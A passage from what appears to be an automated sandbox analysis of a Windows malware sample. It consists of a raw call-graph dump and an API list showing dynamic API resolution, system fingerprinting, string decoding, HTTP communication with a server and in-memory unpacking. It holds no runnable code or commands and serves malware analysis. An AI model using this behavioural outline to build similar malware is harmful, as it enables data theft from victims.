45134->45135 45136 404610 34 API calls 45135->45136 45137 402fce 45136->45137 45138 404610 34 API calls 45137->45138 45139 402fe7 45138->45139 45140 404610 34 API calls 45139->45140 45141 403000 45140->45141 45142 404610 34 API calls 45141->45142 45143 403019 45142->45143 45144 404610 34 API calls 45143->45144 45145 403032 45144->45145 45146 404610 34 API calls 45145->45146 45147 40304b 45146->45147 45148 404610 34 API calls 45147->45148 45149 403064 45148->45149 45150 404610 34 API calls 45149->45150 45151 40307d 45150->45151 45152 404610 34 API calls 45151->45152 45153 403096 45152->45153 45154 404610 34 API calls 45153->45154 45155 4030af 45154->45155 45156 404610 34 API calls 45155->45156 45157 4030c8 45156->45157 45158 404610 34 API calls 45157->45158 45159 4030e1 45158->45159 45160 404610 34 API calls 45159->45160 45161 4030fa 45160->45161 45162 404610 34 API calls 45161->45162 45163 403113 
45162->45163 45164 404610 34 API calls 45163->45164 45165 40312c 45164->45165 45166 404610 34 API calls 45165->45166 45167 403145 45166->45167 45168 404610 34 API calls 45167->45168 45169 40315e 45168->45169 45170 404610 34 API calls 45169->45170 45171 403177 45170->45171 45172 404610 34 API calls 45171->45172 45173 403190 45172->45173 45174 404610 34 API calls 45173->45174 45175 4031a9 45174->45175 45176 404610 34 API calls 45175->45176 45177 4031c2 45176->45177 45178 404610 34 API calls 45177->45178 45179 4031db 45178->45179 45180 404610 34 API calls 45179->45180 45181 4031f4 45180->45181 45182 404610 34 API calls 45181->45182 45183 40320d 45182->45183 45184 404610 34 API calls 45183->45184 45185 403226 45184->45185 45186 404610 34 API calls 45185->45186 45187 40323f 45186->45187 45188 404610 34 API calls 45187->45188 45189 403258 45188->45189 45190 404610 34 API calls 45189->45190 45191 403271 45190->45191 45192 404610 34 API calls 45191->45192 45193 40328a 45192->45193 45194 404610 34 API calls 45193->45194 45195 4032a3 45194->45195 45196 404610 34 API calls 45195->45196 45197 4032bc 45196->45197 45198 404610 34 API calls 45197->45198 45199 4032d5 45198->45199 45200 404610 34 API calls 45199->45200 45201 4032ee 45200->45201 45202 404610 34 API calls 45201->45202 45203 403307 45202->45203 45204 404610 34 API calls 45203->45204 45205 403320 45204->45205 45206 404610 34 API calls 45205->45206 45207 403339 45206->45207 45208 404610 34 API calls 45207->45208 45209 403352 45208->45209 45210 404610 34 API calls 45209->45210 45211 40336b 45210->45211 45212 404610 34 API calls 45211->45212 45213 403384 45212->45213 45214 404610 34 API calls 45213->45214 45215 40339d 45214->45215 45216 404610 34 API calls 45215->45216 45217 4033b6 45216->45217 45218 404610 34 API calls 45217->45218 45219 4033cf 45218->45219 45220 404610 34 API calls 45219->45220 45221 4033e8 45220->45221 45222 404610 34 API calls 45221->45222 45223 403401 45222->45223 45224 404610 34 API calls 
45223->45224 45225 40341a 45224->45225 45226 404610 34 API calls 45225->45226 45227 403433 45226->45227 45228 404610 34 API calls 45227->45228 45229 40344c 45228->45229 45230 404610 34 API calls 45229->45230 45231 403465 45230->45231 45232 404610 34 API calls 45231->45232 45233 40347e 45232->45233 45234 404610 34 API calls 45233->45234 45235 403497 45234->45235 45236 404610 34 API calls 45235->45236 45237 4034b0 45236->45237 45238 404610 34 API calls 45237->45238 45239 4034c9 45238->45239 45240 404610 34 API calls 45239->45240 45241 4034e2 45240->45241 45242 404610 34 API calls 45241->45242 45243 4034fb 45242->45243 45244 404610 34 API calls 45243->45244 45245 403514 45244->45245 45246 404610 34 API calls 45245->45246 45247 40352d 45246->45247 45248 404610 34 API calls 45247->45248 45249 403546 45248->45249 45250 404610 34 API calls 45249->45250 45251 40355f 45250->45251 45252 404610 34 API calls 45251->45252 45253 403578 45252->45253 45254 404610 34 API calls 45253->45254 45255 403591 45254->45255 45256 404610 34 API calls 45255->45256 45257 4035aa 45256->45257 45258 404610 34 API calls 45257->45258 45259 4035c3 45258->45259 45260 404610 34 API calls 45259->45260 45261 4035dc 45260->45261 45262 404610 34 API calls 45261->45262 45263 4035f5 45262->45263 45264 404610 34 API calls 45263->45264 45265 40360e 45264->45265 45266 404610 34 API calls 45265->45266 45267 403627 45266->45267 45268 404610 34 API calls 45267->45268 45269 403640 45268->45269 45270 404610 34 API calls 45269->45270 45271 403659 45270->45271 45272 404610 34 API calls 45271->45272 45273 403672 45272->45273 45274 404610 34 API calls 45273->45274 45275 40368b 45274->45275 45276 404610 34 API calls 45275->45276 45277 4036a4 45276->45277 45278 404610 34 API calls 45277->45278 45279 4036bd 45278->45279 45280 404610 34 API calls 45279->45280 45281 4036d6 45280->45281 45282 404610 34 API calls 45281->45282 45283 4036ef 45282->45283 45284 404610 34 API calls 45283->45284 45285 403708 45284->45285 45286 
404610 34 API calls 45285->45286 45287 403721 45286->45287 45288 404610 34 API calls 45287->45288 45289 40373a 45288->45289 45290 404610 34 API calls 45289->45290 45291 403753 45290->45291 45292 404610 34 API calls 45291->45292 45293 40376c 45292->45293 45294 404610 34 API calls 45293->45294 45295 403785 45294->45295 45296 404610 34 API calls 45295->45296 45297 40379e 45296->45297 45298 404610 34 API calls 45297->45298 45299 4037b7 45298->45299 45300 404610 34 API calls 45299->45300 45301 4037d0 45300->45301 45302 404610 34 API calls 45301->45302 45303 4037e9 45302->45303 45304 404610 34 API calls 45303->45304 45305 403802 45304->45305 45306 404610 34 API calls 45305->45306 45307 40381b 45306->45307 45308 404610 34 API calls 45307->45308 45309 403834 45308->45309 45310 404610 34 API calls 45309->45310 45311 40384d 45310->45311 45312 404610 34 API calls 45311->45312 45313 403866 45312->45313 45314 404610 34 API calls 45313->45314 45315 40387f 45314->45315 45316 404610 34 API calls 45315->45316 45317 403898 45316->45317 45318 404610 34 API calls 45317->45318 45319 4038b1 45318->45319 45320 404610 34 API calls 45319->45320 45321 4038ca 45320->45321 45322 404610 34 API calls 45321->45322 45323 4038e3 45322->45323 45324 404610 34 API calls 45323->45324 45325 4038fc 45324->45325 45326 404610 34 API calls 45325->45326 45327 403915 45326->45327 45328 404610 34 API calls 45327->45328 45329 40392e 45328->45329 45330 404610 34 API calls 45329->45330 45331 403947 45330->45331 45332 404610 34 API calls 45331->45332 45333 403960 45332->45333 45334 404610 34 API calls 45333->45334 45335 403979 45334->45335 45336 404610 34 API calls 45335->45336 45337 403992 45336->45337 45338 404610 34 API calls 45337->45338 45339 4039ab 45338->45339 45340 404610 34 API calls 45339->45340 45341 4039c4 45340->45341 45342 404610 34 API calls 45341->45342 45343 4039dd 45342->45343 45344 404610 34 API calls 45343->45344 45345 4039f6 45344->45345 45346 404610 34 API calls 45345->45346 45347 403a0f 
45346->45347 45348 404610 34 API calls 45347->45348 45349 403a28 45348->45349 45350 404610 34 API calls 45349->45350 45351 403a41 45350->45351 45352 404610 34 API calls 45351->45352 45353 403a5a 45352->45353 45354 404610 34 API calls 45353->45354 45355 403a73 45354->45355 45356 404610 34 API calls 45355->45356 45357 403a8c 45356->45357 45358 404610 34 API calls 45357->45358 45359 403aa5 45358->45359 45360 404610 34 API calls 45359->45360 45361 403abe 45360->45361 45362 404610 34 API calls 45361->45362 45363 403ad7 45362->45363 45364 404610 34 API calls 45363->45364 45365 403af0 45364->45365 45366 404610 34 API calls 45365->45366 45367 403b09 45366->45367 45368 404610 34 API calls 45367->45368 45369 403b22 45368->45369 45370 404610 34 API calls 45369->45370 45371 403b3b 45370->45371 45372 404610 34 API calls 45371->45372 45373 403b54 45372->45373 45374 404610 34 API calls 45373->45374 45375 403b6d 45374->45375 45376 404610 34 API calls 45375->45376 45377 403b86 45376->45377 45378 404610 34 API calls 45377->45378 45379 403b9f 45378->45379 45380 404610 34 API calls 45379->45380 45381 403bb8 45380->45381 45382 404610 34 API calls 45381->45382 45383 403bd1 45382->45383 45384 404610 34 API calls 45383->45384 45385 403bea 45384->45385 45386 404610 34 API calls 45385->45386 45387 403c03 45386->45387 45388 404610 34 API calls 45387->45388 45389 403c1c 45388->45389 45390 404610 34 API calls 45389->45390 45391 403c35 45390->45391 45392 404610 34 API calls 45391->45392 45393 403c4e 45392->45393 45394 404610 34 API calls 45393->45394 45395 403c67 45394->45395 45396 404610 34 API calls 45395->45396 45397 403c80 45396->45397 45398 404610 34 API calls 45397->45398 45399 403c99 45398->45399 45400 404610 34 API calls 45399->45400 45401 403cb2 45400->45401 45402 404610 34 API calls 45401->45402 45403 403ccb 45402->45403 45404 404610 34 API calls 45403->45404 45405 403ce4 45404->45405 45406 404610 34 API calls 45405->45406 45407 403cfd 45406->45407 45408 404610 34 API calls 
45407->45408 45409 403d16 45408->45409 45410 404610 34 API calls 45409->45410 45411 403d2f 45410->45411 45412 404610 34 API calls 45411->45412 45413 403d48 45412->45413 45414 404610 34 API calls 45413->45414 45415 403d61 45414->45415 45416 404610 34 API calls 45415->45416 45417 403d7a 45416->45417 45418 404610 34 API calls 45417->45418 45419 403d93 45418->45419 45420 404610 34 API calls 45419->45420 45421 403dac 45420->45421 45422 404610 34 API calls 45421->45422 45423 403dc5 45422->45423 45424 404610 34 API calls 45423->45424 45425 403dde 45424->45425 45426 404610 34 API calls 45425->45426 45427 403df7 45426->45427 45428 404610 34 API calls 45427->45428 45429 403e10 45428->45429 45430 404610 34 API calls 45429->45430 45431 403e29 45430->45431 45432 404610 34 API calls 45431->45432 45433 403e42 45432->45433 45434 404610 34 API calls 45433->45434 45435 403e5b 45434->45435 45436 404610 34 API calls 45435->45436 45437 403e74 45436->45437 45438 404610 34 API calls 45437->45438 45439 403e8d 45438->45439 45440 404610 34 API calls 45439->45440 45441 403ea6 45440->45441 45442 404610 34 API calls 45441->45442 45443 403ebf 45442->45443 45444 404610 34 API calls 45443->45444 45445 403ed8 45444->45445 45446 404610 34 API calls 45445->45446 45447 403ef1 45446->45447 45448 404610 34 API calls 45447->45448 45449 403f0a 45448->45449 45450 404610 34 API calls 45449->45450 45451 403f23 45450->45451 45452 404610 34 API calls 45451->45452 45453 403f3c 45452->45453 45454 404610 34 API calls 45453->45454 45455 403f55 45454->45455 45456 404610 34 API calls 45455->45456 45457 403f6e 45456->45457 45458 404610 34 API calls 45457->45458 45459 403f87 45458->45459 45460 404610 34 API calls 45459->45460 45461 403fa0 45460->45461 45462 404610 34 API calls 45461->45462 45463 403fb9 45462->45463 45464 404610 34 API calls 45463->45464 45465 403fd2 45464->45465 45466 404610 34 API calls 45465->45466 45467 403feb 45466->45467 45468 404610 34 API calls 45467->45468 45469 404004 45468->45469 45470 
404610 34 API calls 45469->45470 45471 40401d 45470->45471 45472 404610 34 API calls 45471->45472 45473 404036 45472->45473 45474 404610 34 API calls 45473->45474 45475 40404f 45474->45475 45476 404610 34 API calls 45475->45476 45477 404068 45476->45477 45478 404610 34 API calls 45477->45478 45479 404081 45478->45479 45480 404610 34 API calls 45479->45480 45481 40409a 45480->45481 45482 404610 34 API calls 45481->45482 45483 4040b3 45482->45483 45484 404610 34 API calls 45483->45484 45485 4040cc 45484->45485 45486 404610 34 API calls 45485->45486 45487 4040e5 45486->45487 45488 404610 34 API calls 45487->45488 45489 4040fe 45488->45489 45490 404610 34 API calls 45489->45490 45491 404117 45490->45491 45492 404610 34 API calls 45491->45492 45493 404130 45492->45493 45494 404610 34 API calls 45493->45494 45495 404149 45494->45495 45496 404610 34 API calls 45495->45496 45497 404162 45496->45497 45498 404610 34 API calls 45497->45498 45499 40417b 45498->45499 45500 404610 34 API calls 45499->45500 45501 404194 45500->45501 45502 404610 34 API calls 45501->45502 45503 4041ad 45502->45503 45504 404610 34 API calls 45503->45504 45505 4041c6 45504->45505 45506 404610 34 API calls 45505->45506 45507 4041df 45506->45507 45508 404610 34 API calls 45507->45508 45509 4041f8 45508->45509 45510 404610 34 API calls 45509->45510 45511 404211 45510->45511 45512 404610 34 API calls 45511->45512 45513 40422a 45512->45513 45514 404610 34 API calls 45513->45514 45515 404243 45514->45515 45516 404610 34 API calls 45515->45516 45517 40425c 45516->45517 45518 404610 34 API calls 45517->45518 45519 404275 45518->45519 45520 404610 34 API calls 45519->45520 45521 40428e 45520->45521 45522 404610 34 API calls 45521->45522 45523 4042a7 45522->45523 45524 404610 34 API calls 45523->45524 45525 4042c0 45524->45525 45526 404610 34 API calls 45525->45526 45527 4042d9 45526->45527 45528 404610 34 API calls 45527->45528 45529 4042f2 45528->45529 45530 404610 34 API calls 45529->45530 45531 40430b 
45530->45531 45532 404610 34 API calls 45531->45532 45533 404324 45532->45533 45534 404610 34 API calls 45533->45534 45535 40433d 45534->45535 45536 404610 34 API calls 45535->45536 45537 404356 45536->45537 45538 404610 34 API calls 45537->45538 45539 40436f 45538->45539 45540 404610 34 API calls 45539->45540 45541 404388 45540->45541 45542 404610 34 API calls 45541->45542 45543 4043a1 45542->45543 45544 404610 34 API calls 45543->45544 45545 4043ba 45544->45545 45546 404610 34 API calls 45545->45546 45547 4043d3 45546->45547 45548 404610 34 API calls 45547->45548 45549 4043ec 45548->45549 45550 404610 34 API calls 45549->45550 45551 404405 45550->45551 45552 404610 34 API calls 45551->45552 45553 40441e 45552->45553 45554 404610 34 API calls 45553->45554 45555 404437 45554->45555 45556 404610 34 API calls 45555->45556 45557 404450 45556->45557 45558 404610 34 API calls 45557->45558 45559 404469 45558->45559 45560 404610 34 API calls 45559->45560 45561 404482 45560->45561 45562 404610 34 API calls 45561->45562 45563 40449b 45562->45563 45564 404610 34 API calls 45563->45564 45565 4044b4 45564->45565 45566 404610 34 API calls 45565->45566 45567 4044cd 45566->45567 45568 404610 34 API calls 45567->45568 45569 4044e6 45568->45569 45570 404610 34 API calls 45569->45570 45571 4044ff 45570->45571 45572 404610 34 API calls 45571->45572 45573 404518 45572->45573 45574 404610 34 API calls 45573->45574 45575 404531 45574->45575 45576 404610 34 API calls 45575->45576 45577 40454a 45576->45577 45578 404610 34 API calls 45577->45578 45579 404563 45578->45579 45580 404610 34 API calls 45579->45580 45581 40457c 45580->45581 45582 404610 34 API calls 45581->45582 45583 404595 45582->45583 45584 404610 34 API calls 45583->45584 45585 4045ae 45584->45585 45586 404610 34 API calls 45585->45586 45587 4045c7 45586->45587 45588 404610 34 API calls 45587->45588 45589 4045e0 45588->45589 45590 404610 34 API calls 45589->45590 45591 4045f9 45590->45591 45592 419f20 45591->45592 45593 
419f30 43 API calls 45592->45593 45594 41a346 8 API calls 45592->45594 45593->45594 45595 41a456 45594->45595 45596 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45594->45596 45597 41a463 8 API calls 45595->45597 45598 41a526 45595->45598 45596->45595 45597->45598 45599 41a5a8 45598->45599 45600 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45598->45600 45601 41a5b5 6 API calls 45599->45601 45602 41a647 45599->45602 45600->45599 45601->45602 45603 41a654 9 API calls 45602->45603 45604 41a72f 45602->45604 45603->45604 45605 41a7b2 45604->45605 45606 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45604->45606 45607 41a7bb GetProcAddress GetProcAddress 45605->45607 45608 41a7ec 45605->45608 45606->45605 45607->45608 45609 41a825 45608->45609 45610 41a7f5 GetProcAddress GetProcAddress 45608->45610 45611 41a922 45609->45611 45612 41a832 10 API calls 45609->45612 45610->45609 45613 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45611->45613 45614 41a98d 45611->45614 45612->45611 45613->45614 45615 41a996 GetProcAddress 45614->45615 45616 41a9ae 45614->45616 45615->45616 45617 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45616->45617 45618 415ef3 45616->45618 45617->45618 45619 401590 45618->45619 45893 4016b0 45619->45893 45622 41aab0 lstrcpy 45623 4015b5 45622->45623 45624 41aab0 lstrcpy 45623->45624 45625 4015c7 45624->45625 45626 41aab0 lstrcpy 45625->45626 45627 4015d9 45626->45627 45628 41aab0 lstrcpy 45627->45628 45629 401663 45628->45629 45630 415760 45629->45630 45631 415771 45630->45631 45632 41ab30 2 API calls 45631->45632 45633 41577e 45632->45633 45634 41ab30 2 API calls 45633->45634 45635 41578b 45634->45635 45636 41ab30 2 API calls 45635->45636 45637 415798 45636->45637 45638 41aa50 lstrcpy 45637->45638 45639 4157a5 45638->45639 45640 41aa50 lstrcpy 45639->45640 45641 4157b2 45640->45641 45642 41aa50 lstrcpy 
45641->45642 45643 4157bf 45642->45643 45644 41aa50 lstrcpy 45643->45644 45683 4157cc 45644->45683 45645 415440 23 API calls 45645->45683 45646 41abb0 lstrcpy 45646->45683 45647 415893 StrCmpCA 45647->45683 45648 4158f0 StrCmpCA 45649 415a2c 45648->45649 45648->45683 45651 41abb0 lstrcpy 45649->45651 45650 41aab0 lstrcpy 45650->45683 45652 415a38 45651->45652 45653 41ab30 2 API calls 45652->45653 45656 415a46 45653->45656 45654 41aa50 lstrcpy 45654->45683 45655 41ab30 lstrlenA lstrcpy 45655->45683 45658 41ab30 2 API calls 45656->45658 45657 415aa6 StrCmpCA 45659 415be1 45657->45659 45657->45683 45661 415a55 45658->45661 45660 41abb0 lstrcpy 45659->45660 45662 415bed 45660->45662 45663 4016b0 lstrcpy 45661->45663 45664 41ab30 2 API calls 45662->45664 45684 415a61 45663->45684 45666 415bfb 45664->45666 45665 415510 29 API calls 45665->45683 45668 41ab30 2 API calls 45666->45668 45667 415c5b StrCmpCA 45669 415c66 Sleep 45667->45669 45670 415c78 45667->45670 45671 415c0a 45668->45671 45669->45683 45672 41abb0 lstrcpy 45670->45672 45674 4016b0 lstrcpy 45671->45674 45673 415c84 45672->45673 45675 41ab30 2 API calls 45673->45675 45674->45684 45676 415c93 45675->45676 45677 41ab30 2 API calls 45676->45677 45678 415ca2 45677->45678 45680 4016b0 lstrcpy 45678->45680 45679 4159da StrCmpCA 45679->45683 45680->45684 45681 401590 lstrcpy 45681->45683 45682 415b8f StrCmpCA 45682->45683 45683->45645 45683->45646 45683->45647 45683->45648 45683->45650 45683->45654 45683->45655 45683->45657 45683->45665 45683->45667 45683->45679 45683->45681 45683->45682 45684->44738 45686 4176e3 GetVolumeInformationA 45685->45686 45687 4176dc 45685->45687 45689 417721 45686->45689 45687->45686 45688 41778c GetProcessHeap HeapAlloc 45690 4177a9 45688->45690 45691 4177b8 wsprintfA 45688->45691 45689->45688 45693 41aa50 lstrcpy 45690->45693 45692 41aa50 lstrcpy 45691->45692 45694 415ff7 45692->45694 45693->45694 45694->44759 45696 41aab0 lstrcpy 45695->45696 45697 4048e9 45696->45697 45902 404800 
45697->45902 45699 4048f5 45700 41aa50 lstrcpy 45699->45700 45701 404927 45700->45701 45702 41aa50 lstrcpy 45701->45702 45703 404934 45702->45703 45704 41aa50 lstrcpy 45703->45704 45705 404941 45704->45705 45706 41aa50 lstrcpy 45705->45706 45707 40494e 45706->45707 45708 41aa50 lstrcpy 45707->45708 45709 40495b InternetOpenA StrCmpCA 45708->45709 45710 404994 45709->45710 45711 404f1b InternetCloseHandle 45710->45711 45910 418cf0 45710->45910 45712 404f38 45711->45712 45925 40a210 CryptStringToBinaryA 45712->45925 45714 4049b3 45918 41ac30 45714->45918 45717 4049c6 45719 41abb0 lstrcpy 45717->45719 45724 4049cf 45719->45724 45720 41ab30 2 API calls 45721 404f55 45720->45721 45723 41acc0 4 API calls 45721->45723 45722 404f77 ctype 45726 41aab0 lstrcpy 45722->45726 45725 404f6b 45723->45725 45728 41acc0 4 API calls 45724->45728 45727 41abb0 lstrcpy 45725->45727 45739 404fa7 45726->45739 45727->45722 45729 4049f9 45728->45729 45730 41abb0 lstrcpy 45729->45730 45731 404a02 45730->45731 45732 41acc0 4 API calls 45731->45732 45733 404a21 45732->45733 45734 41abb0 lstrcpy 45733->45734 45735 404a2a 45734->45735 45736 41ac30 3 API calls 45735->45736 45737 404a48 45736->45737 45738 41abb0 lstrcpy 45737->45738 45740 404a51 45738->45740 45739->44762 45741 41acc0 4 API calls 45740->45741 45742 404a70 45741->45742 45743 41abb0 lstrcpy 45742->45743 45744 404a79 45743->45744 45745 41acc0 4 API calls 45744->45745 45746 404a98 45745->45746 45747 41abb0 lstrcpy 45746->45747 45748 404aa1 45747->45748 45749 41acc0 4 API calls 45748->45749 45750 404acd 45749->45750 45751 41ac30 3 API calls 45750->45751 45752 404ad4 45751->45752 45753 41abb0 lstrcpy 45752->45753 45754 404add 45753->45754 45755 404af3 InternetConnectA 45754->45755 45755->45711 45756 404b23 HttpOpenRequestA 45755->45756 45758 404b78 45756->45758 45759 404f0e InternetCloseHandle 45756->45759 45760 41acc0 4 API calls 45758->45760 45759->45711 45761 404b8c 45760->45761 45762 41abb0 lstrcpy 45761->45762 45763 404b95 
45762->45763 45764 41ac30 3 API calls 45763->45764 45765 404bb3 45764->45765 45766 41abb0 lstrcpy 45765->45766 45767 404bbc 45766->45767 45768 41acc0 4 API calls 45767->45768 45769 404bdb 45768->45769 45770 41abb0 lstrcpy 45769->45770 45771 404be4 45770->45771 45772 41acc0 4 API calls 45771->45772 45773 404c05 45772->45773 45774 41abb0 lstrcpy 45773->45774 45775 404c0e 45774->45775 45776 41acc0 4 API calls 45775->45776 45777 404c2e 45776->45777 45778 41abb0 lstrcpy 45777->45778 45779 404c37 45778->45779 45780 41acc0 4 API calls 45779->45780 45781 404c56 45780->45781 45782 41abb0 lstrcpy 45781->45782 45783 404c5f 45782->45783 45784 41ac30 3 API calls 45783->45784 45785 404c7d 45784->45785 45786 41abb0 lstrcpy 45785->45786 45787 404c86 45786->45787 45788 41acc0 4 API calls 45787->45788 45789 404ca5 45788->45789 45790 41abb0 lstrcpy 45789->45790 45791 404cae 45790->45791 45792 41acc0 4 API calls 45791->45792 45793 404ccd 45792->45793 45794 41abb0 lstrcpy 45793->45794 45795 404cd6 45794->45795 45796 41ac30 3 API calls 45795->45796 45797 404cf4 45796->45797 45798 41abb0 lstrcpy 45797->45798 45799 404cfd 45798->45799 45800 41acc0 4 API calls 45799->45800 45801 404d1c 45800->45801 45802 41abb0 lstrcpy 45801->45802 45803 404d25 45802->45803 45804 41acc0 4 API calls 45803->45804 45805 404d46 45804->45805 45806 41abb0 lstrcpy 45805->45806 45807 404d4f 45806->45807 45808 41acc0 4 API calls 45807->45808 45809 404d6f 45808->45809 45810 41abb0 lstrcpy 45809->45810 45811 404d78 45810->45811 45812 41acc0 4 API calls 45811->45812 45813 404d97 45812->45813 45814 41abb0 lstrcpy 45813->45814 45815 404da0 45814->45815 45816 41ac30 3 API calls 45815->45816 45817 404dbe 45816->45817 45818 41abb0 lstrcpy 45817->45818 45819 404dc7 45818->45819 45820 41aa50 lstrcpy 45819->45820 45821 404de2 45820->45821 45822 41ac30 3 API calls 45821->45822 45823 404e03 45822->45823 45824 41ac30 3 API calls 45823->45824 45825 404e0a 45824->45825 45826 41abb0 lstrcpy 45825->45826 45827 404e16 45826->45827 
45828 404e37 lstrlenA 45827->45828 45829 404e4a 45828->45829 45830 404e53 lstrlenA 45829->45830 45924 41ade0 45830->45924 45832 404e63 HttpSendRequestA 45833 404e82 InternetReadFile 45832->45833 45834 404eb7 InternetCloseHandle 45833->45834 45839 404eae 45833->45839 45837 41ab10 45834->45837 45836 41acc0 4 API calls 45836->45839 45837->45759 45838 41abb0 lstrcpy 45838->45839 45839->45833 45839->45834 45839->45836 45839->45838 45934 41ade0 45840->45934 45842 411a14 StrCmpCA 45843 411a27 45842->45843 45844 411a1f ExitProcess 45842->45844 45845 411a37 strtok_s 45843->45845 45857 411a44 45845->45857 45846 411bee strtok_s 45846->45857 45847 411b41 StrCmpCA 45847->45857 45848 411ba1 StrCmpCA 45848->45857 45849 411bc0 StrCmpCA 45849->45857 45850 411b63 StrCmpCA 45850->45857 45851 411b82 StrCmpCA 45851->45857 45852 411aad StrCmpCA 45852->45857 45853 411acf StrCmpCA 45853->45857 45854 411afd StrCmpCA 45854->45857 45855 411b1f StrCmpCA 45855->45857 45856 411c12 45856->44764 45857->45846 45857->45847 45857->45848 45857->45849 45857->45850 45857->45851 45857->45852 45857->45853 45857->45854 45857->45855 45857->45856 45858 41ab30 lstrlenA lstrcpy 45857->45858 45859 41ab30 2 API calls 45857->45859 45858->45857 45859->45846 45860->44770 45861->44772 45862->44778 45863->44780 45864->44786 45865->44788 45866->44792 45867->44796 45868->44800 45869->44806 45870->44808 45871->44812 45872->44826 45873->44830 45874->44829 45875->44825 45876->44829 45877->44847 45878->44832 45879->44834 45880->44838 45881->44843 45882->44844 45883->44850 45884->44858 45885->44860 45886->44882 45887->44887 45888->44886 45889->44883 45890->44886 45891->44896 45894 41aab0 lstrcpy 45893->45894 45895 4016c3 45894->45895 45896 41aab0 lstrcpy 45895->45896 45897 4016d5 45896->45897 45898 41aab0 lstrcpy 45897->45898 45899 4016e7 45898->45899 45900 41aab0 lstrcpy 45899->45900 45901 4015a3 45900->45901 45901->45622 45930 401030 45902->45930 45906 404888 lstrlenA 45933 41ade0 45906->45933 45908 404898 
InternetCrackUrlA 45909 4048b7 45908->45909 45909->45699 45911 41aa50 lstrcpy 45910->45911 45912 418d04 45911->45912 45913 41aa50 lstrcpy 45912->45913 45914 418d12 GetSystemTime 45913->45914 45915 418d29 45914->45915 45916 41aab0 lstrcpy 45915->45916 45917 418d8c 45916->45917 45917->45714 45919 41ac41 45918->45919 45920 41ac98 45919->45920 45922 41ac78 lstrcpy lstrcatA 45919->45922 45921 41aab0 lstrcpy 45920->45921 45923 41aca4 45921->45923 45922->45920 45923->45717 45924->45832 45926 40a249 LocalAlloc 45925->45926 45927 404f3e 45925->45927 45926->45927 45928 40a264 CryptStringToBinaryA 45926->45928 45927->45720 45927->45722 45928->45927 45929 40a289 LocalFree 45928->45929 45929->45927 45931 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 45930->45931 45932 41ade0 45931->45932 45932->45906 45933->45908 45934->45842 45935 840000 45938 840006 45935->45938 45939 840015 45938->45939 45942 8407a6 45939->45942 45943 8407c1 45942->45943 45944 8407ca CreateToolhelp32Snapshot 45943->45944 45945 8407e6 Module32First 45943->45945 45944->45943 45944->45945 45946 8407f5 45945->45946 45947 840005 45945->45947 45949 840465 45946->45949 45950 840490 45949->45950 45951 8404a1 VirtualAlloc 45950->45951 45952 8404d9 45950->45952 45951->45952 45952->45952 45953 245003c 45954 2450049 45953->45954 45968 2450e0f SetErrorMode SetErrorMode 45954->45968 45959 2450265 45960 24502ce VirtualProtect 45959->45960 45962 245030b 45960->45962 45961 2450439 VirtualFree 45966 24504be 45961->45966 45967 24505f4 LoadLibraryA 45961->45967 45962->45961 45963 24504e3 LoadLibraryA 45963->45966 45965 24508c7 45966->45963 45966->45967 45967->45965 45969 2450223 45968->45969 45970 2450d90 45969->45970 45971 2450dad 45970->45971 45972 2450238 VirtualAlloc 45971->45972 45973 2450dbb GetPEB 45971->45973 45972->45959 45973->45972

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Blocks of function 419f20 as recovered from the graph edge data (each GetProcAddress block is entered from, and can be skipped by, the short block named in parentheses):
                                            • 419f20-419f2a: entry
                                            • 419f30-41a341: GetProcAddress * 43 (skippable from 419f20)
                                            • 41a346-41a3da: LoadLibraryA * 8
                                            • 41a3dc-41a451: GetProcAddress * 5 (skippable from 41a346)
                                            • 41a463-41a521: GetProcAddress * 8 (skippable from 41a456)
                                            • 41a52f-41a5a3: GetProcAddress * 5 (skippable from 41a526)
                                            • 41a5b5-41a642: GetProcAddress * 6 (skippable from 41a5a8)
                                            • 41a654-41a72a: GetProcAddress * 9 (skippable from 41a647)
                                            • 41a738-41a7ad: GetProcAddress * 5 (skippable from 41a72f)
                                            • 41a7bb-41a7e7: GetProcAddress * 2 (skippable from 41a7b2)
                                            • 41a7f5-41a820: GetProcAddress * 2 (skippable from 41a7ec)
                                            • 41a832-41a91d: GetProcAddress * 10 (skippable from 41a825)
                                            • 41a92b-41a988: GetProcAddress * 4 (skippable from 41a922)
                                            • 41a996-41a9a9: GetProcAddress (skippable from 41a98d)
                                            • 41a9b7-41aa13: GetProcAddress * 4 (skippable from 41a9ae)
                                            • 41aa18-41aa19: exit
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,009C63B8), ref: 00419F3D
                                            • GetProcAddress.KERNEL32(74DD0000,009C6478), ref: 00419F55
                                            • GetProcAddress.KERNEL32(74DD0000,009C99F0), ref: 00419F6E
                                            • GetProcAddress.KERNEL32(74DD0000,009C9A08), ref: 00419F86
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AE0), ref: 00419F9E
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B70), ref: 00419FB7
                                            • GetProcAddress.KERNEL32(74DD0000,009CC200), ref: 00419FCF
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AF8), ref: 00419FE7
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AC8), ref: 0041A000
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B10), ref: 0041A018
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B88), ref: 0041A030
                                            • GetProcAddress.KERNEL32(74DD0000,009C6158), ref: 0041A049
                                            • GetProcAddress.KERNEL32(74DD0000,009C6298), ref: 0041A061
                                            • GetProcAddress.KERNEL32(74DD0000,009C62F8), ref: 0041A079
                                            • GetProcAddress.KERNEL32(74DD0000,009C60F8), ref: 0041A092
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B28), ref: 0041A0AA
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B40), ref: 0041A0C2
                                            • GetProcAddress.KERNEL32(74DD0000,009CC160), ref: 0041A0DB
                                            • GetProcAddress.KERNEL32(74DD0000,009C62D8), ref: 0041A0F3
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B58), ref: 0041A10B
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE20), ref: 0041A124
                                            • GetProcAddress.KERNEL32(74DD0000,009CFDD8), ref: 0041A13C
